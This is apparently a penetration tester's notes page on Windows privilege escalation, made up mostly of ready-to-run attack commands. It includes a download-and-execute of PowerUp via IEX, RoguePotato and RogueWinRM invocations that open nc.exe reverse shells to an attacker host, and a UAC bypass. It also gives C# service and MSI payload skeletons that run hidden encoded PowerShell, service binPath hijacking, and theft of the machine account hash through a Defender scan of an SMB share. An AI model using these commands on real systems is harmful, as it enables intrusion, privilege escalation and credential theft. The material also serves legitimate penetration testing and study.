xct's notes
Search…
Windows

Enumeration

PrivEscCheck

1
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force
2
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
Copied!
or:
1
powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object result.txt
Copied!

PowerUp

1
IEX(New-Object Net.WebClient).downloadString('<url>/PowerUp.ps1') ;Invoke-AllChecks
Copied!

Unquoted Service Paths

1
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Copied!

Common CVEs

CVE-2019-1388: Windows Privilege Escalation Through UAC

Download & start hhupd.exe, get it to start a iexplore.exe in the uac dialog and start cmd.exe in the browsers save file dialog

Privilege Abuse

If privileges are disabled you can use AdjustTokenPrivileges. All these privileged are configured via "secpol.msc -> Local Policies -> User Rights Assignment".

SeBackupPrivilege/SeRestorePrivilege

These privileges allow unrestricted read/write access to every file on the system. They have to be activated first though for which you can use this ps-script:
1
Import-Module .\SeBackupPrivilegeUtils.dll
2
Import-Module .\SeBackupPrivilegeCmdLets.dll
3
Set-SeBackupPrivilege
4
Copy-FileSeBackupPrivilege <source> <target>
Copied!

SeImpersonatePrivilege

This privilege allows to impersonate the user connecting. This connection can happen via HTTP NTLM Auth, SMB or Named Pipes.
This was patched in August 2020 (spooler won't connect to your named pipe anymore, the underlying technique still works though).
This requires that the victim server can reach your box on port 135. You run the OxidResolver and use socat to port your port 135 to the OxidResolvers port. Then you can the exploit:
1
# on attacker box
2
socat tcp-listen:135,reuseaddr,fork tcp:<oxidip>:9999
3
# on target
4
RoguePotato.exe -r <attackerip> -e "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -l 9999
Copied!
Useable if WinRM is not already is not running (Unpatched). Usage (don't quote path):
1
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "<ip> <port> -e cmd"
Copied!

Bypassing UAC

There are lots of different ones out there, a good collection is UACME but it is getting detected very easily. In Covenant you can do:
1
BypassUACCommand cmd.exe "/c powershell -enc <cmd>"
Copied!

Service Abuse

Check Permissions on a service:
1
PowerShell 'service name' | Get-ServiceAcl | Select-Object -ExpandProperty Access
Copied!
For a payload that behaves like a real service use the following skeleton code (create a new c# console application):
1
protected override void OnStart(string[] args)
2
{
3
var si = new ProcessStartInfo
4
{
5
FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
6
Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
7
};
8
9
var proc = new Process
10
{
11
StartInfo = si
12
};
13
14
var t = new Thread(() =>
15
{
16
proc.Start();
17
proc.WaitForExit();
18
proc.Dispose();
19
});
20
21
t.Start();
22
}
Copied!
Finally modify & restart the service:
1
sc config "service name" binPath= "c:\temp\x.exe"
2
sc qc "service name"
3
sc stop "service name"
4
sc start "service name"
Copied!

Always Install Elevated

Create a MSI Installer in Visual Studio. Skeleton:
1
using System.Diagnostics;
2
3
namespace Service
4
{
5
class Program
6
{
7
static void Main(string[] args)
8
{
9
var si = new ProcessStartInfo
10
{
11
FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
12
Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
13
};
14
15
var proc = new Process
16
{
17
StartInfo = si
18
};
19
20
proc.Start();
21
proc.WaitForExit();
22
proc.Dispose();
23
}
24
}
25
}
Copied!
Set output type to WindowsApplication, add a new project to the solution (of type SetupWizard). Make sure it includes "primary output from <project>". Modify settings as you need. To make sure it gets installed right-click on the installer project: View->CustomActions. Then add a custom action to install that containts the primary output from before.
Finally run:
1
msiexec /i <filename> /qn
Copied!

Restoring Service Privileges

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE account
GitHub

Stealing Machine Account Hash from a Low Privileged Shell

Via Defender

Run Windows Defender vs. SMB share to get the machine account hash:
1
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\<ip>\public\file'
Copied!
This hash can be cracked via crack.sh or if the target is a DC, we can pth to secretsdump (requires NT hash support (deprecated)).

Tools

Last modified 11mo ago